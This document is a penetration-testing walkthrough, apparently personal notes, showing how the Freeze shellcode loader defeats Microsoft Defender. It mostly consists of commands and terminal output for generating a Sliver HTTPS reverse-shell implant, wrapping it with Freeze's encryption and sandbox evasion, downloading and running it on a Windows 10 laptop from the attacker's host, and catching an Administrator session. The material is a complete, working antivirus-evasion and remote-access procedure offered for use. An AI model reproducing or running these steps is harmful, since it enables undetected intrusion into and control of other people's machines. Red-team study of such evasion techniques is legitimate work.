============================================================================================================================================
Antivirus/EDR bypass using the shellcode loader 'Freeze'
============================================================================================================================================

=> Source: https://github.com/optiv/Freeze

Freeze is a payload creation tool used for circumventing EDR security controls to execute shellcode in a stealthy manner. 
Freeze utilizes multiple techniques to not only remove Userland EDR hooks, but to also execute shellcode in such a way that it circumvents
other endpoint monitoring controls.

Main features
--------------
> EDR bypass using suspended processes
> Use of direct syscalls
> AES encryption
> ETW Patching
> Sandbox evasion

Note
-----
> The size of the shellcode loaders generated by this tool is big:
  + for a stageless Metasploit shellcode of 196 KB --> the 'Freeze' shellcode loader size is 3,8 MB
  + for a stageless Sliver shellcode of 17,6 MB --> the 'Freeze' shellcode loader size is 65,5 MB


============================================================================================================================================
PoC - Example with a SLIVER reverse HTTPS shell (x64 implant) running on a Windows 10 laptop (with the MS Defender AV enabled & up-to-date)
============================================================================================================================================

-------------------------------------------------------------------------------------------------------------
Step 1 - Generate a SLIVER HTTPS reverse shell (x64 shellcode)
-------------------------------------------------------------------------------------------------------------

jeff@kali:~$ sudo sliver-server
[*] Loaded 17 aliases from disk
[*] Loaded 16 extension(s) from disk

    â–ˆâ–ˆâ–ˆâ–ˆâ–ˆâ–ˆâ–ˆâ•—â–ˆâ–ˆâ•—     â–ˆâ–ˆâ•—â–ˆâ–ˆâ•—   â–ˆâ–ˆâ•—â–ˆâ–ˆâ–ˆâ–ˆâ–ˆâ–ˆâ–ˆâ•—â–ˆâ–ˆâ–ˆâ–ˆâ–ˆâ–ˆâ•—
    â–ˆâ–ˆâ•”â•â•â•â•â•â–ˆâ–ˆâ•‘     â–ˆâ–ˆâ•‘â–ˆâ–ˆâ•‘   â–ˆâ–ˆâ•‘â–ˆâ–ˆâ•”â•â•â•â•â•â–ˆâ–ˆâ•”â•â•â–ˆâ–ˆâ•—
    â–ˆâ–ˆâ–ˆâ–ˆâ–ˆâ–ˆâ–ˆâ•—â–ˆâ–ˆâ•‘     â–ˆâ–ˆâ•‘â–ˆâ–ˆâ•‘   â–ˆâ–ˆâ•‘â–ˆâ–ˆâ–ˆâ–ˆâ–ˆâ•—  â–ˆâ–ˆâ–ˆâ–ˆâ–ˆâ–ˆâ•”â•
    â•šâ•â•â•â•â–ˆâ–ˆâ•‘â–ˆâ–ˆâ•‘     â–ˆâ–ˆâ•‘â•šâ–ˆâ–ˆâ•— â–ˆâ–ˆâ•”â•â–ˆâ–ˆâ•”â•â•â•  â–ˆâ–ˆâ•”â•â•â–ˆâ–ˆâ•—
    â–ˆâ–ˆâ–ˆâ–ˆâ–ˆâ–ˆâ–ˆâ•‘â–ˆâ–ˆâ–ˆâ–ˆâ–ˆâ–ˆâ–ˆâ•—â–ˆâ–ˆâ•‘ â•šâ–ˆâ–ˆâ–ˆâ–ˆâ•”â• â–ˆâ–ˆâ–ˆâ–ˆâ–ˆâ–ˆâ–ˆâ•—â–ˆâ–ˆâ•‘  â–ˆâ–ˆâ•‘
    â•šâ•â•â•â•â•â•â•â•šâ•â•â•â•â•â•â•â•šâ•â•  â•šâ•â•â•â•  â•šâ•â•â•â•â•â•â•â•šâ•â•  â•šâ•â•

All hackers gain evolve
[*] Server v1.5.31 - kali
[*] Welcome to the sliver shell, please type 'help' for options

[server] sliver > generate --arch amd64 -f shellcode --http 192.168.13.94 --save /home/jeff/Documents/Tools/SLiver-C2/SliverRevShellcode8

[*] Generating new windows/amd64 implant binary
[*] Symbol obfuscation is enabled
[*] Build completed in 2m46s
? Encode shellcode with shikata ga nai? No
[*] Implant saved to /home/jeff/Documents/Tools/SLiver-C2/SliverRevShellcode8

jeff@kali:~/Documents/Tools/SLiver-C2$ sudo chmod 777 SliverRevShellcode8
[sudo] password for jeff: 


-------------------------------------------------------------------------------------------------------------
Step 2 - Use 'Freeze' to generate a shellcode loader for the SLIVER HTTPS reverse shell (x64 shellcode)
-------------------------------------------------------------------------------------------------------------

jeff@kali:~/Documents/Tools/Freeze-main$ ./Freeze -h                                                                                                       
                                                                                                                                                           
        ___________                                                                                                                                        
        \_   _____/______   ____   ____ ________ ____                                                                                                      
         |    __) \_  __ \_/ __ \_/ __ \\___   // __ \                                                                                                     
         |     \   |  | \/\  ___/\  ___/ /    /\  ___/                                                                                                     
         \___  /   |__|    \___  >\___  >_____ \\___  >                                                                                                    
             \/                \/     \/      \/    \/                                                                                                     
                                        (@Tyl0us)                                                                                                          
        Soon they will learn that revenge is a dish... best served COLD...                                                                                 
                                                                                                                                                           
Usage of ./Freeze:                                                                                                                                         
  -I string
        Path to the raw 64-bit shellcode.
  -O string
        Name of output file (e.g. loader.exe or loader.dll). Depending on what file extension defined will determine if Freeze makes a dll or exe.
  -console
        Only for Binary Payloads - Generates verbose console information when the payload is executed. This will disable the hidden window feature.
  -encrypt
        Encrypts the shellcode using AES 256 encryption
  -export string
        For DLL Loaders Only - Specify a specific Export function for a loader to have.
  -process string
        The name of process to spawn. This process has to exist in C:\Windows\System32\. Example 'notepad.exe' (default "notepad.exe")
  -sandbox
        Enables sandbox evasion by checking:
                Is Endpoint joined to a domain?
                Does the Endpoint have more than 2 CPUs?
                Does the Endpoint have more than 4 gigs of RAM?
  -sha256
        Provides the SHA256 value of the loaders (This is useful for tracking)


jeff@kali:~/Documents/Tools/Freeze-main$ ./Freeze -I /home/jeff/Documents/Tools/SLiver-C2/SliverRevShellcode8 -O FreezeSliverLoader.exe --encrypt 
                                                  -process notepad.exe -sandbox
        ___________                                    
        \_   _____/______   ____   ____ ________ ____  
         |    __) \_  __ \_/ __ \_/ __ \\___   // __ \ 
         |     \   |  | \/\  ___/\  ___/ /    /\  ___/ 
         \___  /   |__|    \___  >\___  >_____ \\___  >
             \/                \/     \/      \/    \/ 
                                        (@Tyl0us)
        Soon they will learn that revenge is a dish... best served COLD...
                 
[*] Encrypting Shellcode Using AES Encryption
[+] Shellcode Encrypted
[!] Selected Process to Suspend: notepad.exe
[+] Loader Compiled
[*] Compiling Payload
[+] Payload FreezeSliverLoader.exe Compiled


jeff@kali:~/Documents/Tools/Freeze-main$ ls -al
total 74588
drwxr-xr-x  7 jeff jeff     4096 Jan  5 17:33 .
drwxr-xr-x 48 jeff jeff     4096 Jan  5 16:15 ..
-rwxr-xr-x  1 jeff jeff  3660980 Jan  5 16:16 Freeze
-rw-r--r--  1 jeff jeff     4999 Sep 29 21:31 Freeze.go
-rwxr-xr-x  1 jeff jeff  3895808 Jan  5 16:33 FreezeMSFLoader.exe
-rwxr-xr-x  1 jeff jeff 68743168 Jan  5 17:24 FreezeSliverLoader.exe
-rw-r--r--  1 jeff jeff      317 Sep 29 21:31 .gitignore
-rw-r--r--  1 jeff jeff       96 Sep 29 21:31 go.mod
-rw-r--r--  1 jeff jeff      207 Sep 29 21:31 go.sum
drwxr-xr-x  2 jeff jeff     4096 Jan  5 16:32 .lib
-rw-r--r--  1 jeff jeff     1071 Sep 29 21:31 LICENSE
drwxr-xr-x  2 jeff jeff     4096 Sep 29 21:31 Loader
-rw-r--r--  1 jeff jeff     8614 Jan  5 17:33 notes.txt
-rw-r--r--  1 jeff jeff     7863 Sep 29 21:31 README.md
drwxr-xr-x  2 jeff jeff     4096 Sep 29 21:31 Screenshots
drwxr-xr-x  2 jeff jeff     4096 Sep 29 21:31 Struct
drwxr-xr-x  2 jeff jeff     4096 Sep 29 21:31 Utils


------------------------------------------------------------------------------------------------------------------------------------
Step 3 - Download and execute on a Windows 10 laptop the Freeze shellcode loader (x64 implant) without being detected nor blocked
         by the Microsoft Defender Antivirus 
------------------------------------------------------------------------------------------------------------------------------------

PS C:\Users\Administrator\Downloads> Get-MpComputerStatus | Select AntivirusEnabled,RealTimeProtectionEnabled,IoavProtectionEnabled,AntispywareEnabled,AntivirusSignatureLastUpdated | FL

AntivirusEnabled              : True
RealTimeProtectionEnabled     : True
IoavProtectionEnabled         : True
AntispywareEnabled            : True
AntivirusSignatureLastUpdated : 04/01/2023 05:15:05

PS C:\Users\Administrator\Downloads> wget -URI http://192.168.13.94:8080/FreezeSliverLoader.exe -OutFile FreezeSliverLoader.exe

PS C:\Users\Administrator\Downloads> FreezeSliverLoader.exe


------------------------------------------------------------------------------------------------------------------------------------
Step 4 - Enjoy the SLIVER reverse shell (x64 implant) running on the target Windows 10 laptop 
------------------------------------------------------------------------------------------------------------------------------------

jeff@kali:~$ sudo sliver-server
[*] Loaded 17 aliases from disk
[*] Loaded 16 extension(s) from disk

    â–ˆâ–ˆâ–ˆâ–ˆâ–ˆâ–ˆâ–ˆâ•—â–ˆâ–ˆâ•—     â–ˆâ–ˆâ•—â–ˆâ–ˆâ•—   â–ˆâ–ˆâ•—â–ˆâ–ˆâ–ˆâ–ˆâ–ˆâ–ˆâ–ˆâ•—â–ˆâ–ˆâ–ˆâ–ˆâ–ˆâ–ˆâ•—
    â–ˆâ–ˆâ•”â•â•â•â•â•â–ˆâ–ˆâ•‘     â–ˆâ–ˆâ•‘â–ˆâ–ˆâ•‘   â–ˆâ–ˆâ•‘â–ˆâ–ˆâ•”â•â•â•â•â•â–ˆâ–ˆâ•”â•â•â–ˆâ–ˆâ•—
    â–ˆâ–ˆâ–ˆâ–ˆâ–ˆâ–ˆâ–ˆâ•—â–ˆâ–ˆâ•‘     â–ˆâ–ˆâ•‘â–ˆâ–ˆâ•‘   â–ˆâ–ˆâ•‘â–ˆâ–ˆâ–ˆâ–ˆâ–ˆâ•—  â–ˆâ–ˆâ–ˆâ–ˆâ–ˆâ–ˆâ•”â•
    â•šâ•â•â•â•â–ˆâ–ˆâ•‘â–ˆâ–ˆâ•‘     â–ˆâ–ˆâ•‘â•šâ–ˆâ–ˆâ•— â–ˆâ–ˆâ•”â•â–ˆâ–ˆâ•”â•â•â•  â–ˆâ–ˆâ•”â•â•â–ˆâ–ˆâ•—
    â–ˆâ–ˆâ–ˆâ–ˆâ–ˆâ–ˆâ–ˆâ•‘â–ˆâ–ˆâ–ˆâ–ˆâ–ˆâ–ˆâ–ˆâ•—â–ˆâ–ˆâ•‘ â•šâ–ˆâ–ˆâ–ˆâ–ˆâ•”â• â–ˆâ–ˆâ–ˆâ–ˆâ–ˆâ–ˆâ–ˆâ•—â–ˆâ–ˆâ•‘  â–ˆâ–ˆâ•‘
    â•šâ•â•â•â•â•â•â•â•šâ•â•â•â•â•â•â•â•šâ•â•  â•šâ•â•â•â•  â•šâ•â•â•â•â•â•â•â•šâ•â•  â•šâ•â•

All hackers gain evolve
[*] Server v1.5.31 - kali
[*] Welcome to the sliver shell, please type 'help' for options


[server] sliver > https --lhost 192.168.13.94 --lport 443

[*] Starting HTTPS :443 listener ...

[*] Successfully started job #1


[server] sliver > jobs

 ID   Name    Protocol   Port 
==== ======= ========== ======
 1    https   tcp        443  


[server] sliver > sessions 

[*] No sessions ðŸ™

[*] Session a44cb77e ORDINARY_WOOL - 192.168.13.154:2256 (Laptop1) - windows/amd64 - Thu, 05 Jan 2023 17:31:16 CET


[server] sliver > sessions

 ID         Transport   Remote Address        Hostname   Username        Operating System   Health  
========== =========== ===================== ========== =============== ================== =========
 a44cb77e   http(s)     192.168.13.154:2256   Laptop1   Administrator   windows/amd64      [ALIVE] 


[server] sliver > sessions -i a44cb77e

[*] Active session ORDINARY_WOOL (a44cb77e)


[server] sliver (ORDINARY_WOOL) > whoami

Logon ID: Laptop1\Administrator
[*] Current Token ID: Laptop1\Administrator


[server] sliver (ORDINARY_WOOL) > getuid

S-1-5-21-936125016-2310263949-2175806047-500


[server] sliver (ORDINARY_WOOL) > exit

